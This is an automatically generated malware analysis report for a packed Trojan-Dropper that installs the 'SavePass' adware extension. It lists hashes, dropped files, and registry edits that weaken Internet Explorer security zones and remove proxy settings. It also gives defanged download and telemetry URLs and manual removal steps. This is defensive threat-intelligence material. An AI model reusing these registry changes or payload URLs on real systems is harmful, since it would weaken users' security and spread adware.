Skip to main content

Gen.Variant.Adware.Zusy.127996_a0a59f72f2


Trojan-Dropper.Win32.Agent.peok (Kaspersky), Gen:Variant.Adware.Zusy.127996 (B) (Emsisoft), Gen:Variant.Adware.Zusy.127996 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: a0a59f72f2bbe495c7b4314a34f5b16c

SHA1: 8757838e8c142167819d54ce4f83796f136eb8c5

SHA256: a76002410292e9b7481b5a7d9465eadb66cda025a8d6c7fcb76e2636a61500b6

SSDeep: 6144:68yWGSreo5tSQDV2AOeJirGX0wLDcDqyvF0N6McKDm6WKR9Ula3:VtHSJFrGX0KDg0N6IDm6/R3

Size: 212384 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2015-02-01 20:46:10

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Ywuovtbypk.exe:468
e33a47b.exe:324
%original file name%.exe:228
ping.exe:1948
ping.exe:596
ping.exe:1940
ping.exe:336
ping.exe:460
ping.exe:320
ping.exe:188
ping.exe:496
ping.exe:236

The Trojan injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process Ywuovtbypk.exe:468 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
%Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
%Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
%Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
%Program Files%\SavePass 1.1\utils.exe (80413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (0 bytes)

The process e33a47b.exe:324 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (0 bytes)

The process %original file name%.exe:228 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

Registry activity

The process Ywuovtbypk.exe:468 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"Publisher" = "OB"
"UninstallString" = "%Program Files%\SavePass 1.1\Uninstall.exe /fcp=1 /runexe='%Program Files%\SavePass 1.1\UninstallBrw.exe' /url='http://static.gonotiftime.com/notf_sys/index.html' /brwtype='uni' /onerrorexe='%Program Files%\SavePass 1.1\utils.exe' /crregname='SavePass 1.1' /appid='69829' /srcid='001504' /bic='C54C51C1259F4E0794ABE2EFF455B67AIE' /verifier='c86f1da5444bc59351fec9b57e5afa7b' /brwshtoms='15000' /installerversion='1_36_01_22' /statsdomain='http://stats.ourinputdatastorage.com/utility.gif?' /errorsdomain='http://errors.ourinputdatastorage.com/utility.gif?' /monetizationdomain='http://logs.ourinputdatastorage.com/monetization.gif?'"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrPublisherId" = "29777"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayName" = "SavePass 1.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayIcon" = "%Program Files%\SavePass 1.1\utils.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"

[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"

[HKCU\Software\InstalledBrowserExtensions\OB]
"69829" = "SavePass 1.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 C9 AC DD 1B F6 C2 52 AD 8A FE 5D 1D 44 87 3F"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrAppId" = "69829"
"DisplayVersion" = "1.36.01.22"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"

[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process e33a47b.exe:324 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"11995.bat" = "11995"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A E8 3D CB 24 78 19 E9 9B 7B 5C B4 29 E1 3F 9B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"

[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:228 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E C3 29 8D 82 74 05 92 B8 30 E7 36 92 D9 B5 9B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"e33a47b.exe" = "e33a47b"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process ping.exe:1948 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 77 FD 17 B7 8D 44 DE 70 E1 F9 90 1A EF CD AA"

The process ping.exe:596 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E8 9C 56 85 AA C2 8B 90 C1 DE 0C CC 7B A9 DA"

The process ping.exe:1940 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 94 0E D9 68 6B E4 02 14 F9 CC 3F 87 6A A5 62"

The process ping.exe:336 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C D7 54 5C 5E FF 86 86 D2 1D 20 33 81 0E 5D C7"

The process ping.exe:460 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 BC 8C 76 44 E5 13 A7 81 C1 BF BA 58 4D 70 0C"

The process ping.exe:320 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 4B 8E 9B A1 60 70 61 5F 21 60 18 24 8B 40 2A"

The process ping.exe:188 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 61 04 DA 01 85 AE F8 B1 44 FF 55 ED E5 DA 77"

The process ping.exe:496 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 27 B9 3B 09 2D 54 E8 B9 35 22 67 C4 A8 5C 6A"

The process ping.exe:236 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 91 1F 9A B0 F3 C7 60 4B 1F F5 66 06 0B E7 35"

Dropped PE files

MD5 File path
72d181e3089d6eee4c1f81c1b13ea88cc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a
efc6d4bd8ac2e791549143ed7dc39d39c:\Program Files\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe
0374c8fec0166143ddad92c34878adf8c:\Program Files\SavePass 1.1\Uninstall.exe
6860cb0759479d5b028812cf6a24f9d2c:\Program Files\SavePass 1.1\UninstallBrw.exe
4b47189b70d27324629908716d40ac7dc:\Program Files\SavePass 1.1\utils.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Ywuovtbypk.exe:468
    e33a47b.exe:324
    %original file name%.exe:228
    ping.exe:1948
    ping.exe:596
    ping.exe:1940
    ping.exe:336
    ping.exe:460
    ping.exe:320
    ping.exe:188
    ping.exe:496
    ping.exe:236

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
    %Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
    %Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
    %Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
    %Program Files%\SavePass 1.1\utils.exe (80413 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40963475122.72762bd24fddc16367e94a0e4291cdc13185a
.rdata81923665122.4907ae9775f4ec0f9ea8215ac0d0005da1bf

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=10&n=ms_started&rnd=7171208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649208.85.150.249
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_a
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_d
